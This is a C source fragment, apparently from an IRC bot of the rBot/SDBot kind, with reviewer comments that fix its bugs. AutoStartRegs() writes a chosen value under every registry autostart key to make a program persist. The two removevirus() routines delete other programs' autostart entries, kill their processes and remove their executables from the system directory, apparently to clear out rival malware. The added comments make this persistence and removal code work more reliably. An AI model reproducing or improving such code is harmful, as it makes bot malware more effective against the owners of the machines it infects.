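/*
 * Walk the `viruses` table (terminated by an entry whose subkey is NULL).
 * For every entry whose autostart registry value is present, delete that
 * value and then the matching executable in the system directory.
 *
 * No return value; failures of the individual registry/file calls are
 * ignored, as in the original, but an unopened key is no longer used.
 */
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128];
	HKEY hkey;
	LONG lRet;
	DWORD dwSize;

	for (unsigned int i = 0; viruses[i].subkey; i++) {
		hkey = NULL;
		/* KEY_READ alone is not enough for RegDeleteValue (it needs
		 * KEY_SET_VALUE); open with write rights like RegDelete() does. */
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ | KEY_WRITE, &hkey);
		/* On failure hkey is indeterminate: never query or close it. */
		if (lRet != ERROR_SUCCESS)
			continue;

		/* RegQueryValueEx overwrites dwSize with the value's length, so it
		 * must be reset every iteration or later queries see a shrunken
		 * buffer and fail with ERROR_MORE_DATA. */
		dwSize = sizeof(szDataBuf);
		if (fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			fRegDeleteValue(hkey, viruses[i].value);
			/* FIXME (kept from original): the running process is not
			 * terminated here, so DeleteFile on an in-use image will fail.
			 * Something like KillProcess(viruses[i].file) belongs before
			 * the delete. */
			if (GetSystemDirectory(sysdir, sizeof(sysdir)) != 0) {
				/* Bounded join: a long system path plus file name must not
				 * overrun virusexecuteble (the original used sprintf). */
				int n = snprintf(virusexecuteble, sizeof(virusexecuteble), "%s\\%s", sysdir, viruses[i].file);
				if (n > 0 && (size_t)n < sizeof(virusexecuteble))
					DeleteFile(virusexecuteble);
			}
		}
		fRegCloseKey(hkey);
	}
}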
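/*
 * Write (or, when nfilename is NULL, remove) the value `valuename` under
 * every key listed in the `autostart` table.
 *
 * nfilename - NUL-terminated string to store as REG_SZ, or NULL to delete
 *             the value instead.
 *
 * No return value; per-key failures are skipped silently.
 */
void AutoStartRegs(char *nfilename)
{
	HKEY key;

	for (size_t i = 0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
		key = NULL;
		/* If the key cannot be created/opened, `key` is indeterminate:
		 * skip the entry instead of writing through or closing a garbage
		 * handle (the original never checked this return). */
		if (fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE,
		                    KEY_ALL_ACCESS, NULL, &key, NULL) != ERROR_SUCCESS)
			continue;

		if (nfilename) {
			/* For REG_SZ, cbData is expected to include the terminating
			 * NUL; the original passed strlen() only, storing an
			 * unterminated string. */
			DWORD cb = (DWORD)strlen(nfilename) + 1;
			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, cb);
		} else {
			fRegDeleteValue(key, valuename);
		}
		fRegCloseKey(key);
	}
}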
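/*
 * Delete a registry value, or a whole key together with all of its
 * descendant keys.
 *
 * root   - open key (or predefined HKEY_*) that `subkey` is relative to.
 * subkey - key path under root; must be non-NULL.
 * name   - value name to delete under `subkey`, or NULL to delete the key
 *          `subkey` itself (recursively).
 *
 * Returns TRUE when the final delete succeeded, FALSE otherwise.
 *
 * Fixes against the original: the recursion passed the child key name as
 * `name`, which deleted a *value* rather than descending into the child;
 * the final RegDeleteKey was issued relative to the key's own handle instead
 * of `root`; the enumeration index advanced while children were being
 * removed (skipping every other child) and the size argument was never
 * reset; the opened handle leaked; and the key branch always returned FALSE.
 */
BOOL RegDelete(HKEY root, LPCTSTR subkey, LPCTSTR name)
{
	HKEY key = NULL;

	if (!subkey)
		return FALSE;

	if (name) {
		BOOL ok = FALSE;
		if (fRegOpenKeyEx(root, subkey, 0, KEY_READ | KEY_WRITE, &key) == ERROR_SUCCESS) {
			ok = (fRegDeleteValue(key, name) == ERROR_SUCCESS);
			fRegCloseKey(key);
		}
		return ok;
	}

	/* Fast path: RegDeleteKey only succeeds on a key without subkeys. */
	if (fRegDeleteKey(root, subkey) == ERROR_SUCCESS)
		return TRUE;

	/* Slow path: remove every child key first, then retry the delete. */
	if (fRegOpenKeyEx(root, subkey, 0, KEY_READ | KEY_WRITE, &key) != ERROR_SUCCESS)
		return FALSE;

	for (;;) {
		char buf[256] = {0};
		DWORD chr = sizeof(buf);   /* RegEnumKeyEx shrinks this; reset per call */
		FILETIME ftm;
		/* Always enumerate index 0: deleting a child shifts the rest down. */
		LONG rc = fRegEnumKeyEx(key, 0, buf, &chr, NULL, NULL, NULL, &ftm);
		if (rc != ERROR_SUCCESS)
			break;   /* ERROR_NO_MORE_ITEMS, or a real error: stop either way */
		/* Recurse on the child key (name == NULL) relative to this handle. */
		if (!RegDelete(key, buf, NULL))
			break;   /* a child we cannot remove would otherwise loop forever */
	}
	fRegCloseKey(key);

	return fRegDeleteKey(root, subkey) == ERROR_SUCCESS;
}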
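/*
 * Same sweep as the other removevirus() listing, but asks listProcesses()
 * to terminate the running process before deleting its executable.
 *
 * The status strings written to sendbuf are never transmitted inside this
 * function as written (no send call); they are kept, bounded, because a
 * caller-side use is not visible from this listing.
 */
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128];
	SOCKET sock;
	HKEY hkey;
	char sendbuf[IRCLINE];
	char current[MAX_PATH];   /* was 20 bytes and filled with strcpy: overflow */
	LONG lRet;
	DWORD dwSize;

	/* NOTE(review): this socket is never closed in this function and its
	 * return value is not checked; whether a close wrapper exists in this
	 * project is not visible here, so the leak is flagged, not fixed. */
	sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

	for (unsigned int i = 0; viruses[i].subkey; i++) {
		hkey = NULL;
		/* RegDeleteValue needs KEY_SET_VALUE, which KEY_READ does not
		 * include; open with write rights like RegDelete() does. */
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ | KEY_WRITE, &hkey);
		/* On failure hkey is indeterminate: never query or close it. */
		if (lRet != ERROR_SUCCESS)
			continue;

		/* RegQueryValueEx overwrites dwSize; reset it every iteration. */
		dwSize = sizeof(szDataBuf);
		if (fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			fRegDeleteValue(hkey, viruses[i].value);

			/* Bounded copy of the image name for listProcesses(). */
			snprintf(current, sizeof(current), "%s", viruses[i].file);
			if (listProcesses(sock, NULL, FALSE, current) == 1)
				snprintf(sendbuf, sizeof(sendbuf), "[PROC]: Process killed: %s", viruses[i].file);
			else
				snprintf(sendbuf, sizeof(sendbuf), "[PROC]: Failed to terminate process: %s", viruses[i].file);

			if (GetSystemDirectory(sysdir, sizeof(sysdir)) != 0) {
				/* Bounded join; skip the delete on truncation rather than
				 * remove a wrong path. */
				int n = snprintf(virusexecuteble, sizeof(virusexecuteble), "%s\\%s", sysdir, viruses[i].file);
				if (n > 0 && (size_t)n < sizeof(virusexecuteble))
					DeleteFile(virusexecuteble);
			}
		}
		fRegCloseKey(hkey);
	}
	snprintf(sendbuf, sizeof(sendbuf), "[AV]: Antivirus search complete! ");
}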